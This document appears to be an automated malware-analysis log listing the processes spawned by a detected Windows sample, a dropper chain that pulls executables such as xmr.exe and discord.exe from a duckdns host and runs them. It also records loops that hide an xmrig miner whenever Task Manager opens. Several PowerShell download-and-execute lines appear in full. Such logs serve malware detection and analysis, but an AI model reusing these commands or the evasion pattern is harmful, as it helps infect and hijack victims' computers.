Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\down.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\down.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\user\AppData\Roaming\6.exe'; C:\Users\user\AppData\Roaming\6.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\user\AppData\Roaming\1.exe'; C:\Users\user\AppData\Roaming\1.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\user\AppData\Roaming\2.exe'; C:\Users\user\AppData\Roaming\2.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\6.exe "C:\Users\user\AppData\Roaming\6.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
